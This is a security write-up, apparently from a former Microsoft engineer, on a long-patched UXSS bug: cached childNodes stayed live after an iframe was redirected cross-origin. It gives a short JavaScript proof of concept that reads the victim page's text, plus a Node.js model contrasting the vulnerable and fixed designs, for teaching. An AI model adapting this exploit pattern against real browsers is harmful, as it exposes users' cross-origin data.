Another variant of the cached-collection UXSS family: document.childNodes from a same-origin IFrame remained live after a cross-origin redirect, and its nodes’ ownerDocument pointed into the new cross-origin document.
// iFrame is the window object of a same-origin <iframe> (e.g. frames[0]),
// so its document is still reachable here and the NodeList can be cached.
var xChildNodes = iFrame.document.childNodes;
// Redirect the IFrame cross-origin
iFrame.location = "http://www.victim.com/";
// After navigation the cached list should be stale or the access should throw;
// in the affected builds its nodes had been re-parented to the new document.
setTimeout(function() {
  alert(xChildNodes[0].ownerDocument.body.innerText); // Cross-origin read
}, 2000);
The NodeList returned by childNodes held direct references to the underlying markup nodes. When the document was replaced by the cross-origin navigation, the node list was not invalidated, and the nodes’ ownerDocument pointer was updated to the new document without re-applying origin checks. A fixed engine keeps two invariants that this broke: a navigation detaches the old document rather than re-parenting its nodes, and every cross-document access is checked against the accessing script’s origin at the time of the access, not only when the reference was first obtained.
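To make the two invariants concrete, here is an added example (not code from the original post, and not a browser’s internals) that models the vulnerable design beside the fixed one. Everything in it is invented for illustration: the `Origin`, `Node`, `Doc` and `Frame` classes, `navigateVulnerable` (re-parents cached nodes, as the post describes), `navigateFixed` (detaches the old document), `readUnchecked` and `readChecked` (access without and with a same-origin gate), and `runScenario`, which replays the exploit flow above against each combination. It runs under Node.js with no dependencies.

```javascript
// Added example: a small model of the cached-collection bug beside its fix.
// None of these names exist in any browser; they are illustration only.

class Origin {
  // Origin = (scheme, host, port); default ports are normalised by URL().
  constructor(url) {
    const u = new URL(url);
    this.scheme = u.protocol;                                   // "http:" / "https:"
    this.host = u.hostname;
    this.port = u.port || (u.protocol === "https:" ? "443" : "80");
  }
  sameAs(other) {
    return this.scheme === other.scheme &&
           this.host === other.host &&
           this.port === other.port;
  }
}

class Node {
  constructor(ownerDocument, nodeName) {
    this.ownerDocument = ownerDocument;   // back-pointer to the owning document
    this.nodeName = nodeName;
  }
}

class Doc {
  constructor(url, bodyText) {
    this.origin = new Origin(url);
    this.body = { innerText: bodyText };
    this.childNodes = [new Node(this, "HTML")];   // what a cached NodeList holds
  }
}

class Frame {
  constructor(url, bodyText) { this.document = new Doc(url, bodyText); }
}

// Vulnerable navigation: the old document's nodes are re-parented to the new
// document, so any list that cached them now reaches the cross-origin page.
function navigateVulnerable(frame, url, bodyText) {
  const next = new Doc(url, bodyText);
  for (const n of frame.document.childNodes) n.ownerDocument = next;
  frame.document = next;
}

// Fixed navigation: the old document is detached and keeps its own nodes.
function navigateFixed(frame, url, bodyText) {
  frame.document = new Doc(url, bodyText);
}

// Access without an origin check: trusts whatever ownerDocument points at.
function readUnchecked(_accessorOrigin, node) {
  return node.ownerDocument.body.innerText;
}

// Access with the check applied at access time, whatever the node's history.
function readChecked(accessorOrigin, node) {
  const doc = node.ownerDocument;
  if (!accessorOrigin.sameAs(doc.origin)) {
    throw new Error("SecurityError: cross-origin access to document body");
  }
  return doc.body.innerText;
}

// Replays the post's flow: cache childNodes while same-origin, navigate the
// frame to a cross-origin URL, then read through the cached node.
// Constructed sample data: attacker.example frames www.victim.com.
function runScenario(navigate, read) {
  const attacker = new Origin("http://attacker.example/");
  const frame = new Frame("http://attacker.example/frame.html", "attacker page");
  const xChildNodes = frame.document.childNodes;   // cached while same-origin
  navigate(frame, "http://www.victim.com/", "victim secret");
  try {
    return { text: read(attacker, xChildNodes[0]) };
  } catch (e) {
    return { error: e.message };
  }
}

console.log("vulnerable:", runScenario(navigateVulnerable, readUnchecked));
console.log("fixed:     ", runScenario(navigateFixed, readChecked));
console.log("check only:", runScenario(navigateVulnerable, readChecked));
```

The third scenario is the one worth noting: even if navigation still re-parented the nodes, an origin check applied at access time would turn the leak into a SecurityError. The two invariants are independent defences, which is why a fix should carry both rather than rely on the navigation path alone.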
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.